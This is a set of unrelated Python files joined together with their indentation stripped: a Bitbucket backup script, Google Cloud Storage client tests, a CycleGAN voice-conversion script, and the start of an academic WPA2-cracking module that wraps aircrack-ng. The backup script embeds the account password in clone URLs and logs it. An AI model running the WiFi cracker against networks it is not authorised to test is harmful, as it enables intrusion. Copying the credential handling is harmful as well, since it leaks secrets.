url = 'https://api.bitbucket.org/2.0/repositories/{project_owner}/{project_slug}/issues'.format(**tmp_repo_info)
try:
result = get_list(url, headers=self.headers)
except HTTPError as error:
if error.code == 404:
log.warning('DEBUG dump_project_issues() assuming no issues for export - got 404 for %r', url)
# FIXME
# either a bad URL or could be correct but there are no issues - not sure how to tell here.
return [] # always assume no issues
log.error('dump_project_issues http error %r', error.errno)
raise
return result
def dump_project_downloads(self, project_slug):
# dump meta data and the files
tmp_repo_info = {'project_slug': project_slug}
tmp_repo_info.update(self.repo_info)
url = 'https://api.bitbucket.org/2.0/repositories/{project_owner}/{project_slug}/downloads'.format(**tmp_repo_info)
log.debug('dump_project_downloads() %r', url)
result = get_list(url, headers=self.headers)
return result
def dump_project_code(self, project_slug, dest_path, scm_type):
# source checkout
# could use URL in meta data but password has to be specificed somewhere...
tmp_repo_info = {'project_slug': project_slug, 'dest_path': dest_path}
tmp_repo_info.update(self.repo_info)
if scm_type == 'hg':
cmd = 'hg clone https://{username}:{secret}@bitbucket.org/{project_owner}/{project_slug} {dest_path}'.format(**tmp_repo_info)
elif scm_type == 'git':
cmd = 'git clone --mirror https://{username}:{secret}@bitbucket.org/{project_owner}/{project_slug} {dest_path}'.format(**tmp_repo_info)
cmd = 'git clone https://{username}:{secret}@bitbucket.org/{project_owner}/{project_slug} {dest_path}'.format(**tmp_repo_info)
else:
raise NotImplemented('unknown scm type %r' % scm_type)
log.debug('CMD: %r', cmd)
log.debug('CMD: %s', cmd)
subprocess.check_call(cmd)
def dump_project_wiki(self, project_slug, dest_path, scm_type):
# wiki source checkout
tmp_repo_info = {'project_slug': project_slug, 'dest_path': dest_path}
tmp_repo_info.update(self.repo_info)
if scm_type == 'hg':
cmd = 'hg clone https://{username}:{secret}@bitbucket.org/{project_owner}/{project_slug}/wiki {dest_path}'.format(**tmp_repo_info)
elif scm_type == 'git':
cmd = 'git clone --mirror https://{username}:{secret}@bitbucket.org/{project_owner}/{project_slug}/wiki {dest_path}'.format(**tmp_repo_info)
cmd = 'git clone https://{username}:{secret}@bitbucket.org/{project_owner}/{project_slug}/wiki {dest_path}'.format(**tmp_repo_info)
else:
raise NotImplemented('unknown scm type %r' % scm_type)
log.debug('CMD: %s', cmd)
subprocess.check_call(cmd)
def dump_one_project(self, project_slug):
# export everything to file system for one project
log.info('dump_one_project() project_slug %r', project_slug)
project_metadata = self.dump_project_metadata(project_slug)
log.debug('dump_project_metadata() result=%r', project_metadata)
#log.debug('%s', json.dumps(project_metadata, indent=4))
# NOTE `project_metadata` probably patches `project`
# safe_mkdir()
log.debug('\thas_wiki %r', project_metadata['has_wiki'])
log.debug('\tavatar %r', project_metadata['links']['avatar'])
log.debug('\tis_private %r', project_metadata['is_private'])
dir_name = gen_local_project_dir_name(project_metadata)
safe_mkdir(dir_name)
image_filename = dir_name +'.png' # assume png
#image = get_url(project_metadata['links']['avatar']['href'], headers=self.headers)
image = get_url(project_metadata['links']['avatar']['href'])
f = open(image_filename, 'wb')
f.write(image)
f.close()
issues_filename = os.path.join(dir_name, 'issues.json')
project_issues = self.dump_project_issues(project_slug)
#project_issues = {'issues': project_issues}
log.debug('project_issues=%r', project_issues)
if project_issues:
f = open(issues_filename, 'wb')
json.dump(project_issues, f)
f.close()
project_downloads = self.dump_project_downloads(project_slug)
log.debug('project_downloads=%r', project_downloads)
if project_downloads:
downloads_dirname = os.path.join(dir_name, 'downloads')
safe_mkdir(downloads_dirname)
downloads_filename = os.path.join(dir_name, 'downloads.json')
f = open(downloads_filename, 'wb')
json.dump(project_downloads, f)
f.close()
for download in project_downloads:
log.debug('download %r', download)
download_name = os.path.join(downloads_dirname, download['name'])
url = download['links']['self']['href']
data = get_url(url)
f = open(download_name, 'wb')
f.write(data)
f.close()
code_dirname = os.path.join(dir_name, 'code')
result = self.dump_project_code(project_slug, code_dirname, project_metadata['scm'])
log.debug('result=%r', result)
if project_metadata.get('has_wiki'):
wiki_dirname = os.path.join(dir_name, 'wiki')
result = self.dump_project_wiki(project_slug, wiki_dirname, project_metadata['scm'])
log.debug('result=%r', result)
log.info('dump_one_project() complete for %r', project_slug)
def doit():
username = os.environ.get('BB_USERNAME')
password = os.environ.get('BB_PASSWORD')
r = EasyBitBucketAPI(username, password)
all_repo_meta_filename = 'all_repos.json'
if not os.path.exists(all_repo_meta_filename):
project_list = r.dump_project_list()
#log.debug('project_list=%r', project_list)
tmp_str = json.dumps(project_list,indent=4)
f = open(all_repo_meta_filename, 'wb')
f.write(tmp_str)
f.close()
else:
log.info('using cached project_list from file %r', all_repo_meta_filename)
f = open(all_repo_meta_filename, 'rb')
project_list = json.load(f)
f.close()
for project in project_list:
project_name = project['name']
project_slug = project['slug']
log.info('project_name %r', project_name)
r.dump_one_project(project_slug)
log.warning('any git repos will contain password in config checkout file!')
def main(argv=None):
if argv is None:
argv = sys.argv
print('Python %s on %s' % (sys.version, sys.platform))
doit()
return 0
if __name__ == "__main__":
sys.exit(main())
|
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import unittest
import mock
import requests
from six.moves import http_client
def _make_credentials():
import google.auth.credentials
return mock.Mock(spec=google.auth.credentials.Credentials)
def _make_response(status=http_client.OK, content=b'', headers={}):
response = requests.Response()
response.status_code = status
response._content = content
response.headers = headers
response.request = requests.Request()
return response
def _make_json_response(data, status=http_client.OK, headers=None):
headers = headers or {}
headers['Content-Type'] = 'application/json'
return _make_response(
status=status,
content=json.dumps(data).encode('utf-8'),
headers=headers)
def _make_requests_session(responses):
session = mock.create_autospec(requests.Session, instance=True)
session.request.side_effect = responses
return session
class TestClient(unittest.TestCase):
@staticmethod
def _get_target_class():
from google.cloud.storage.client import Client
return Client
def _make_one(self, *args, **kw):
return self._get_target_class()(*args, **kw)
def test_ctor_connection_type(self):
from google.cloud.storage._http import Connection
PROJECT = 'PROJECT'
CREDENTIALS = _make_credentials()
client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
self.assertEqual(client.project, PROJECT)
self.assertIsInstance(client._connection, Connection)
self.assertIs(client._connection.credentials, CREDENTIALS)
self.assertIsNone(client.current_batch)
self.assertEqual(list(client._batch_stack), [])
def test__push_batch_and__pop_batch(self):
from google.cloud.storage.batch import Batch
PROJECT = 'PROJECT'
CREDENTIALS = _make_credentials()
client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
batch1 = Batch(client)
batch2 = Batch(client)
client._push_batch(batch1)
self.assertEqual(list(client._batch_stack), [batch1])
self.assertIs(client.current_batch, batch1)
client._push_batch(batch2)
self.assertIs(client.current_batch, batch2)
# list(_LocalStack) returns in reverse order.
self.assertEqual(list(client._batch_stack), [batch2, batch1])
self.assertIs(client._pop_batch(), batch2)
self.assertEqual(list(client._batch_stack), [batch1])
self.assertIs(client._pop_batch(), batch1)
self.assertEqual(list(client._batch_stack), [])
def test__connection_setter(self):
PROJECT = 'PROJECT'
CREDENTIALS = _make_credentials()
client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
client._base_connection = None # Unset the value from the constructor
client._connection = connection = object()
self.assertIs(client._base_connection, connection)
def test__connection_setter_when_set(self):
PROJECT = 'PROJECT'
CREDENTIALS = _make_credentials()
client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
self.assertRaises(ValueError, setattr, client, '_connection', None)
def test__connection_getter_no_batch(self):
PROJECT = 'PROJECT'
CREDENTIALS = _make_credentials()
client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
self.assertIs(client._connection, client._base_connection)
self.assertIsNone(client.current_batch)
def test__connection_getter_with_batch(self):
from google.cloud.storage.batch import Batch
PROJECT = 'PROJECT'
CREDENTIALS = _make_credentials()
client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
batch = Batch(client)
client._push_batch(batch)
self.assertIsNot(client._connection, client._base_connection)
self.assertIs(client._connection, batch)
self.assertIs(client.current_batch, batch)
def test_bucket(self):
from google.cloud.storage.bucket import Bucket
PROJECT = 'PROJECT'
CREDENTIALS = _make_credentials()
BUCKET_NAME = 'BUCKET_NAME'
client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
bucket = client.bucket(BUCKET_NAME)
self.assertIsInstance(bucket, Bucket)
self.assertIs(bucket.client, client)
self.assertEqual(bucket.name, BUCKET_NAME)
self.assertIsNone(bucket.user_project)
def test_bucket_w_user_project(self):
from google.cloud.storage.bucket import Bucket
PROJECT = 'PROJECT'
USER_PROJECT = 'USER_PROJECT'
CREDENTIALS = _make_credentials()
BUCKET_NAME = 'BUCKET_NAME'
client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
bucket = client.bucket(BUCKET_NAME, user_project=USER_PROJECT)
self.assertIsInstance(bucket, Bucket)
self.assertIs(bucket.client, client)
self.assertEqual(bucket.name, BUCKET_NAME)
self.assertEqual(bucket.user_project, USER_PROJECT)
def test_batch(self):
from google.cloud.storage.batch import Batch
PROJECT = 'PROJECT'
CREDENTIALS = _make_credentials()
client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
batch = client.batch()
self.assertIsInstance(batch, Batch)
self.assertIs(batch._client, client)
def test_get_bucket_miss(self):
from google.cloud.exceptions import NotFound
PROJECT = 'PROJECT'
CREDENTIALS = _make_credentials()
client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
NONESUCH = 'nonesuch'
URI = '/'.join([
client._connection.API_BASE_URL,
'storage',
client._connection.API_VERSION,
'b',
'nonesuch?projection=noAcl',
])
http = _make_requests_session([
_make_json_response({}, status=http_client.NOT_FOUND)])
client._http_internal = http
with self.assertRaises(NotFound):
client.get_bucket(NONESUCH)
http.request.assert_called_once_with(
method='GET', url=URI, data=mock.ANY, headers=mock.ANY)
def test_get_bucket_hit(self):
from google.cloud.storage.bucket import Bucket
PROJECT = 'PROJECT'
CREDENTIALS = _make_credentials()
client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
BUCKET_NAME = 'bucket-name'
URI = '/'.join([
client._connection.API_BASE_URL,
'storage',
client._connection.API_VERSION,
'b',
'%s?projection=noAcl' % (BUCKET_NAME,),
])
data = {'name': BUCKET_NAME}
http = _make_requests_session([_make_json_response(data)])
client._http_internal = http
bucket = client.get_bucket(BUCKET_NAME)
self.assertIsInstance(bucket, Bucket)
self.assertEqual(bucket.name, BUCKET_NAME)
http.request.assert_called_once_with(
method='GET', url=URI, data=mock.ANY, headers=mock.ANY)
def test_lookup_bucket_miss(self):
PROJECT = 'PROJECT'
CREDENTIALS = _make_credentials()
client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
NONESUCH = 'nonesuch'
URI = '/'.join([
client._connection.API_BASE_URL,
'storage',
client._connection.API_VERSION,
'b',
'nonesuch?projection=noAcl',
])
http = _make_requests_session([
_make_json_response({}, status=http_client.NOT_FOUND)])
client._http_internal = http
bucket = client.lookup_bucket(NONESUCH)
self.assertIsNone(bucket)
http.request.assert_called_once_with(
method='GET', url=URI, data=mock.ANY, headers=mock.ANY)
def test_lookup_bucket_hit(self):
from google.cloud.storage.bucket import Bucket
PROJECT = 'PROJECT'
CREDENTIALS = _make_credentials()
client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
BUCKET_NAME = 'bucket-name'
URI = '/'.join([
client._connection.API_BASE_URL,
'storage',
client._connection.API_VERSION,
'b',
'%s?projection=noAcl' % (BUCKET_NAME,),
])
data = {'name': BUCKET_NAME}
http = _make_requests_session([_make_json_response(data)])
client._http_internal = http
bucket = client.lookup_bucket(BUCKET_NAME)
self.assertIsInstance(bucket, Bucket)
self.assertEqual(bucket.name, BUCKET_NAME)
http.request.assert_called_once_with(
method='GET', url=URI, data=mock.ANY, headers=mock.ANY)
def test_create_bucket_conflict(self):
from google.cloud.exceptions import Conflict
PROJECT = 'PROJECT'
CREDENTIALS = _make_credentials()
client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
BUCKET_NAME = 'bucket-name'
URI = '/'.join([
client._connection.API_BASE_URL,
'storage',
client._connection.API_VERSION,
'b?project=%s' % (PROJECT,),
])
data = {'error': {'message': 'Conflict'}}
sent = {'name': BUCKET_NAME}
http = _make_requests_session([
_make_json_response(data, status=http_client.CONFLICT)])
client._http_internal = http
self.assertRaises(Conflict, client.create_bucket, BUCKET_NAME)
http.request.assert_called_once_with(
method='POST', url=URI, data=mock.ANY, headers=mock.ANY)
json_sent = http.request.call_args_list[0][1]['data']
self.assertEqual(sent, json.loads(json_sent))
def test_create_bucket_success(self):
from google.cloud.storage.bucket import Bucket
PROJECT = 'PROJECT'
CREDENTIALS = _make_credentials()
client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
BUCKET_NAME = 'bucket-name'
URI = '/'.join([
client._connection.API_BASE_URL,
'storage',
client._connection.API_VERSION,
'b?project=%s' % (PROJECT,),
])
sent = {'name': BUCKET_NAME, 'billing': {'requesterPays': True}}
data = sent
http = _make_requests_session([_make_json_response(data)])
client._http_internal = http
bucket = client.create_bucket(BUCKET_NAME, requester_pays=True)
self.assertIsInstance(bucket, Bucket)
self.assertEqual(bucket.name, BUCKET_NAME)
self.assertTrue(bucket.requester_pays)
http.request.assert_called_once_with(
method='POST', url=URI, data=mock.ANY, headers=mock.ANY)
json_sent = http.request.call_args_list[0][1]['data']
self.assertEqual(sent, json.loads(json_sent))
def test_list_buckets_empty(self):
from six.moves.urllib.parse import parse_qs
from six.moves.urllib.parse import urlparse
PROJECT = 'PROJECT'
CREDENTIALS = _make_credentials()
client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
http = _make_requests_session([_make_json_response({})])
client._http_internal = http
buckets = list(client.list_buckets())
self.assertEqual(len(buckets), 0)
http.request.assert_called_once_with(
method='GET', url=mock.ANY, data=mock.ANY, headers=mock.ANY)
requested_url = http.request.mock_calls[0][2]['url']
expected_base_url = '/'.join([
client._connection.API_BASE_URL,
'storage',
client._connection.API_VERSION,
'b',
])
self.assertTrue(requested_url.startswith(expected_base_url))
expected_query = {
'project': [PROJECT],
'projection': ['noAcl'],
}
uri_parts = urlparse(requested_url)
self.assertEqual(parse_qs(uri_parts.query), expected_query)
def test_list_buckets_non_empty(self):
PROJECT = 'PROJECT'
CREDENTIALS = _make_credentials()
client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
BUCKET_NAME = 'bucket-name'
data = {'items': [{'name': BUCKET_NAME}]}
http = _make_requests_session([_make_json_response(data)])
client._http_internal = http
buckets = list(client.list_buckets())
self.assertEqual(len(buckets), 1)
self.assertEqual(buckets[0].name, BUCKET_NAME)
http.request.assert_called_once_with(
method='GET', url=mock.ANY, data=mock.ANY, headers=mock.ANY)
def test_list_buckets_all_arguments(self):
from six.moves.urllib.parse import parse_qs
from six.moves.urllib.parse import urlparse
PROJECT = 'foo-bar'
CREDENTIALS = _make_credentials()
client = self._make_one(project=PROJECT, credentials=CREDENTIALS)
MAX_RESULTS = 10
PAGE_TOKEN = 'ABCD'
PREFIX = 'subfolder'
PROJECTION = 'full'
FIELDS = 'items/id,nextPageToken'
data = {'items': []}
http = _make_requests_session([_make_json_response(data)])
client._http_internal = http
iterator = client.list_buckets(
max_results=MAX_RESULTS,
page_token=PAGE_TOKEN,
prefix=PREFIX,
projection=PROJECTION,
fields=FIELDS,
)
buckets = list(iterator)
self.assertEqual(buckets, [])
http.request.assert_called_once_with(
method='GET', url=mock.ANY, data=mock.ANY, headers=mock.ANY)
requested_url = http.request.mock_calls[0][2]['url']
expected_base_url = '/'.join([
client._connection.API_BASE_URL,
'storage',
client._connection.API_VERSION,
'b',
])
self.assertTrue(requested_url.startswith(expected_base_url))
expected_query = {
'project': [PROJECT],
'maxResults': [str(MAX_RESULTS)],
'pageToken': [PAGE_TOKEN],
'prefix': [PREFIX],
'projection': [PROJECTION],
'fields': [FIELDS],
}
uri_parts = urlparse(requested_url)
self.assertEqual(parse_qs(uri_parts.query), expected_query)
def test_page_empty_response(self):
from google.api_core import page_iterator
project = 'PROJECT'
credentials = _make_credentials()
client = self._make_one(project=project, credentials=credentials)
iterator = client.list_buckets()
page = page_iterator.Page(iterator, (), None)
iterator._page = page
self.assertEqual(list(page), [])
def test_page_non_empty_response(self):
import six
from google.cloud.storage.bucket import Bucket
project = 'PROJECT'
credentials = _make_credentials()
client = self._make_one(project=project, credentials=credentials)
blob_name = 'bucket-name'
response = {'items': [{'name': blob_name}]}
def dummy_response():
return response
iterator = client.list_buckets()
iterator._get_next_page_response = dummy_response
page = six.next(iterator.pages)
self.assertEqual(page.num_items, 1)
bucket = six.next(page)
self.assertEqual(page.remaining, 0)
self.assertIsInstance(bucket, Bucket)
self.assertEqual(bucket.name, blob_name)
|
#! python
# -*- coding: utf-8 -*-
# Author: kun
# @Time: 2019-07-23 14:25
import os
import numpy as np
import argparse
import torch
import time
import librosa
import pickle
import preprocess
from trainingDataset import trainingDataset
from model_tf import Generator, Discriminator
from tqdm import tqdm
import soundfile as sf
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
class CycleGANTraining(object):
def __init__(self,
logf0s_normalization,
mcep_normalization,
coded_sps_A_norm,
coded_sps_B_norm,
model_checkpoint,
validation_A_dir,
output_A_dir,
validation_B_dir,
output_B_dir,
restart_training_at=None):
self.device = torch.device('cuda')
# Speech Parameters
logf0s_normalization = np.load(logf0s_normalization)
self.log_f0s_mean_A = logf0s_normalization['mean_A']
self.log_f0s_std_A = logf0s_normalization['std_A']
self.log_f0s_mean_B = logf0s_normalization['mean_B']
self.log_f0s_std_B = logf0s_normalization['std_B']
mcep_normalization = np.load(mcep_normalization)
self.coded_sps_A_mean = mcep_normalization['mean_A']
self.coded_sps_A_std = mcep_normalization['std_A']
self.coded_sps_B_mean = mcep_normalization['mean_B']
self.coded_sps_B_std = mcep_normalization['std_B']
# Generator and Discriminator
self.generator_A2B = Generator().to(self.device)
self.generator_B2A = Generator().to(self.device)
self.discriminator_A = Discriminator().to(self.device)
self.discriminator_B = Discriminator().to(self.device)
self.modelCheckpoint = model_checkpoint
os.makedirs(self.modelCheckpoint, exist_ok=True)
# Validation set Parameters
self.validation_A_dir = validation_A_dir
self.output_A_dir = output_A_dir
os.makedirs(self.output_A_dir, exist_ok=True)
self.validation_B_dir = validation_B_dir
self.output_B_dir = output_B_dir
os.makedirs(self.output_B_dir, exist_ok=True)
# Storing Discriminatior and Generator Loss
self.generator_loss_store = []
self.discriminator_loss_store = []
self.file_name = 'log_store_non_sigmoid.txt'
def validation_for_A_dir(self):
num_mcep = 36
sampling_rate = 16000
frame_period = 5.0
n_frames = 128
validation_A_dir = self.validation_A_dir
output_A_dir = self.output_A_dir
print("Generating Validation Data B from A...")
for file in os.listdir(validation_A_dir):
filePath = os.path.join(validation_A_dir, file)
wav, _ = librosa.load(filePath, sr=sampling_rate, mono=True)
wav = preprocess.wav_padding(wav=wav,
sr=sampling_rate,
frame_period=frame_period,
multiple=4)
f0, timeaxis, sp, ap = preprocess.world_decompose(
wav=wav, fs=sampling_rate, frame_period=frame_period)
f0_converted = preprocess.pitch_conversion(f0=f0,
mean_log_src=self.log_f0s_mean_A,
std_log_src=self.log_f0s_std_A,
mean_log_target=self.log_f0s_mean_B,
std_log_target=self.log_f0s_std_B)
coded_sp = preprocess.world_encode_spectral_envelop(
sp=sp, fs=sampling_rate, dim=num_mcep)
coded_sp_transposed = coded_sp.T
coded_sp_norm = (coded_sp_transposed -
self.coded_sps_A_mean) / self.coded_sps_A_std
coded_sp_norm = np.array([coded_sp_norm])
if torch.cuda.is_available():
coded_sp_norm = torch.from_numpy(coded_sp_norm).cuda().float()
else:
coded_sp_norm = torch.from_numpy(coded_sp_norm).float()
coded_sp_converted_norm = self.generator_A2B(coded_sp_norm)
coded_sp_converted_norm = coded_sp_converted_norm.cpu().detach().numpy()
coded_sp_converted_norm = np.squeeze(coded_sp_converted_norm)
coded_sp_converted = coded_sp_converted_norm * \
self.coded_sps_B_std + self.coded_sps_B_mean
coded_sp_converted = coded_sp_converted.T
coded_sp_converted = np.ascontiguousarray(coded_sp_converted)
decoded_sp_converted = preprocess.world_decode_spectral_envelop(
coded_sp=coded_sp_converted, fs=sampling_rate)
wav_transformed = preprocess.world_speech_synthesis(f0=f0_converted,
decoded_sp=decoded_sp_converted,
ap=ap,
fs=sampling_rate,
frame_period=frame_period)
sf.write(os.path.join(output_A_dir, os.path.basename(file)), wav_transformed, sampling_rate, 'PCM_24')
#librosa.output.write_wav(path=os.path.join(output_A_dir, os.path.basename(file)),
# y=wav_transformed,
# sr=sampling_rate)
def validation_for_B_dir(self):
num_mcep = 36
sampling_rate = 16000
frame_period = 5.0
n_frames = 128
validation_B_dir = self.validation_B_dir
output_B_dir = self.output_B_dir
print("Generating Validation Data A from B...")
for file in os.listdir(validation_B_dir):
filePath = os.path.join(validation_B_dir, file)
wav, _ = librosa.load(filePath, sr=sampling_rate, mono=True)
wav = preprocess.wav_padding(wav=wav,
sr=sampling_rate,
frame_period=frame_period,
multiple=4)
f0, timeaxis, sp, ap = preprocess.world_decompose(
wav=wav, fs=sampling_rate, frame_period=frame_period)
f0_converted = preprocess.pitch_conversion(f0=f0,
mean_log_src=self.log_f0s_mean_B,
std_log_src=self.log_f0s_std_B,
mean_log_target=self.log_f0s_mean_A,
std_log_target=self.log_f0s_std_A)
coded_sp = preprocess.world_encode_spectral_envelop(
sp=sp, fs=sampling_rate, dim=num_mcep)
coded_sp_transposed = coded_sp.T
coded_sp_norm = (coded_sp_transposed -
self.coded_sps_B_mean) / self.coded_sps_B_std
coded_sp_norm = np.array([coded_sp_norm])
if torch.cuda.is_available():
coded_sp_norm = torch.from_numpy(coded_sp_norm).cuda().float()
else:
coded_sp_norm = torch.from_numpy(coded_sp_norm).float()
coded_sp_converted_norm = self.generator_B2A(coded_sp_norm)
coded_sp_converted_norm = coded_sp_converted_norm.cpu().detach().numpy()
coded_sp_converted_norm = np.squeeze(coded_sp_converted_norm)
coded_sp_converted = coded_sp_converted_norm * \
self.coded_sps_A_std + self.coded_sps_A_mean
coded_sp_converted = coded_sp_converted.T
coded_sp_converted = np.ascontiguousarray(coded_sp_converted)
decoded_sp_converted = preprocess.world_decode_spectral_envelop(
coded_sp=coded_sp_converted, fs=sampling_rate)
wav_transformed = preprocess.world_speech_synthesis(f0=f0_converted,
decoded_sp=decoded_sp_converted,
ap=ap,
fs=sampling_rate,
frame_period=frame_period)
sf.write(os.path.join(output_B_dir, os.path.basename(file)), wav_transformed, sampling_rate, 'PCM_24')
#librosa.output.write_wav(path=os.path.join(output_B_dir, os.path.basename(file)),
# y=wav_transformed,
# sr=sampling_rate)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="Train CycleGAN using source dataset and target dataset")
logf0s_normalization_default = './cache/logf0s_normalization.npz'
mcep_normalization_default = './cache/mcep_normalization.npz'
coded_sps_A_norm = './cache/coded_sps_A_norm.pickle'
coded_sps_B_norm = './cache/coded_sps_B_norm.pickle'
model_checkpoint = './model_checkpoint/'
resume_training_at = './model_checkpoint/_CycleGAN_CheckPoint'
# resume_training_at = None
validation_A_dir_default = './data/inputA/'
output_A_dir_default = './converted_sound/inputA'
validation_B_dir_default = './data/inputB/'
output_B_dir_default = './converted_sound/inputB/'
parser.add_argument('--logf0s_normalization', type=str,
help="Cached location for log f0s normalized", default=logf0s_normalization_default)
parser.add_argument('--mcep_normalization', type=str,
help="Cached location for mcep normalization", default=mcep_normalization_default)
parser.add_argument('--coded_sps_A_norm', type=str,
help="mcep norm for data A", default=coded_sps_A_norm)
parser.add_argument('--coded_sps_B_norm', type=str,
help="mcep norm for data B", default=coded_sps_B_norm)
parser.add_argument('--model_checkpoint', type=str,
help="location where you want to save the model", default=model_checkpoint)
parser.add_argument('--resume_training_at', type=str,
help="Location of the pre-trained model to resume training",
default=resume_training_at)
parser.add_argument('--validation_A_dir', type=str,
help="validation set for sound source A", default=validation_A_dir_default)
parser.add_argument('--output_A_dir', type=str,
help="output for converted Sound Source A", default=output_A_dir_default)
parser.add_argument('--validation_B_dir', type=str,
help="Validation set for sound source B", default=validation_B_dir_default)
parser.add_argument('--output_B_dir', type=str,
help="Output for converted sound Source B", default=output_B_dir_default)
argv = parser.parse_args()
logf0s_normalization = argv.logf0s_normalization
mcep_normalization = argv.mcep_normalization
coded_sps_A_norm = argv.coded_sps_A_norm
coded_sps_B_norm = argv.coded_sps_B_norm
model_checkpoint = argv.model_checkpoint
resume_training_at = argv.resume_training_at
validation_A_dir = argv.validation_A_dir
output_A_dir = argv.output_A_dir
validation_B_dir = argv.validation_B_dir
output_B_dir = argv.output_B_dir
# Check whether following cached files exists
if not os.path.exists(logf0s_normalization) or not os.path.exists(mcep_normalization):
print(
"Cached files do not exist, please run the program preprocess_training.py first")
print(torch.cuda.get_device_name())
cycleGAN = CycleGANTraining(logf0s_normalization=logf0s_normalization,
mcep_normalization=mcep_normalization,
coded_sps_A_norm=coded_sps_A_norm,
coded_sps_B_norm=coded_sps_B_norm,
model_checkpoint=model_checkpoint,
validation_A_dir=validation_A_dir,
output_A_dir=output_A_dir,
validation_B_dir=validation_B_dir,
output_B_dir=output_B_dir,
restart_training_at=resume_training_at)
cycleGAN.validation_for_A_dir()
cycleGAN.validation_for_B_dir()
|
<reponame>defNotTrendy/secureLogin
#!/usr/bin/env python3
"""
WPA2 cracking
Automation of MitM Attack on WiFi Networks
Bachelor's Thesis UIFS FIT VUT
<NAME>
2016
#Implementation notes
- Airodump-ng writes its Text User Interface to stderr, stdout is empty.
- Aircrack-ng does not flush when stdout is redirected to file and -q is set.
- Feedback from running subprocesses is obtained from their stdout and stderr. Method Popen.communicate() is
unfortunately not suitable. 'Read data from stdout and stderr, until end-of-file is reached. Wait for process
to terminate.'
Reading of stdout and stderr is done continuously while the subprocess is running. This is achieved by that
the subprocess is writing its stdout and stderr to temporary files. These files are then opened again and continuous
writing and reading is performed. There's only one writer and one reader per file.
- Subprocesses' feedback result is available as an update of process' state, flags and stats. State describes current
position in a lifecycle of the process. Flags can be set or cleared based on events during life of the process.
Flags can be later cleared or set by other parts of the script - after the flag was recognised and appropriate
reaction was performed.
"""
import logging
import os
import pipes
import re
import tempfile
import time
from enum import Enum, unique
from typing import List, TextIO
import pkg_resources
from .model import WirelessAccessPoint, WirelessInterface
from .updatableProcess import UpdatableProcess
from .common import WirelessCapturer, deauthenticate, WifimitmError
__author__ = '<NAME>'
__email__ = '<EMAIL>'
logger = logging.getLogger(__name__)
class Wpa2Error(WifimitmError):
pass
class PassphraseNotInDictionaryError(Wpa2Error):
pass
class PassphraseNotInAnyDictionaryError(Wpa2Error):
pass
class Wpa2Cracker(UpdatableProcess):
"""
"WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys.
So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying
to crack it.
There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack
the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process,
only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static,
so collecting IVs like when cracking WEP encryption, does not speed up the attack. The only thing that does give
the information to start an attack is the handshake between client and AP."
`cracking_wpa [Aircrack-ng] <http://www.aircrack-ng.org/doku.php?id=cracking_wpa>`_
Although cracking WPA/WPA2 is based on brute force, used dictionary can be personalized by available AP details to
increase the chance of finding the key.
"""
@unique
class State(Enum):
"""
Wpa2Cracker process states.
"""
CRACKING = 0
"""Cracking or waiting for more IVs."""
STARTED = 2
"""Process just started."""
TERMINATED = 100
"""Process have been terminated. By self.stop() call, on its own or by someone else."""
def __init__(self, ap, dictionary):
if not ap.wpa_handshake_cap_path:
raise ValueError
self.state = self.State.STARTED
self.ap = ap
self.dictionary = dictionary
logger.debug("dictionary '{}'".format(str(self.dictionary)))
cmd = ['aircrack-ng',
'-a', '2',
'--bssid', self.ap.bssid,
'-q', # If set, no status information is displayed.
'-w', '-', # dictionary is provided to stdin
'-l', 'psk.ascii', # Write the key into a file.
self.ap.wpa_handshake_cap_path]
# NOTE: Aircrack-ng does not flush when stdout is redirected to file and -q is set.
super().__init__(cmd, stdin=self.dictionary) # start process
def __str__(self):
return '<{!s} state={!s}>'.format(
type(self).__name__, self.state)
def update(self):
"""
Update state of running process from process' feedback.
Read new output from stdout and stderr, check if process is alive.
Aircrack-ng does not flush when stdout is redirected to file and -q is set. Complete stdout is available
in the moment of termination of aircrack-ng.
:raises PassphraseNotInDictionaryError: If passphrase was not found in provided dictionary.
"""
super().update()
# Is process running? State would be changed after reading stdout and stderr.
self.poll()
# check every added line in stdout
if self.stdout_r and not self.stdout_r.closed:
for line in self.stdout_r:
if 'Failed. Next try with' in line:
if self.state != self.State.TERMINATED:
self.state = self.State.CRACKING
if 'KEY FOUND!' in line:
if self.state != self.State.TERMINATED:
self.state = self.State.CRACKING
self.ap.save_psk_file(os.path.join(self.tmp_dir.name, 'psk.ascii'))
logger.debug('Wpa2Cracker found key!')
if 'Passphrase not in dictionary' in line:
logger.debug('Passphrase not in dictionary.')
raise PassphraseNotInDictionaryError()
# check stderr
if self.stderr_r and not self.stderr_r.closed:
for line in self.stderr_r: # type: str
# NOTE: stderr should be empty
logger.warning("Unexpected stderr of 'aircrack-ng': '{}'. {}".format(line, str(self)))
# Change state if process was not running in the time of poll() call in the beginning of this method.
# NOTE: Process' poll() needs to be called in the beginning of this method and returncode checked in the end
# to ensure all feedback (stdout and stderr) is read and states are changed accordingly.
# If the process exited, its state is not changed immediately. All available feedback is read and then
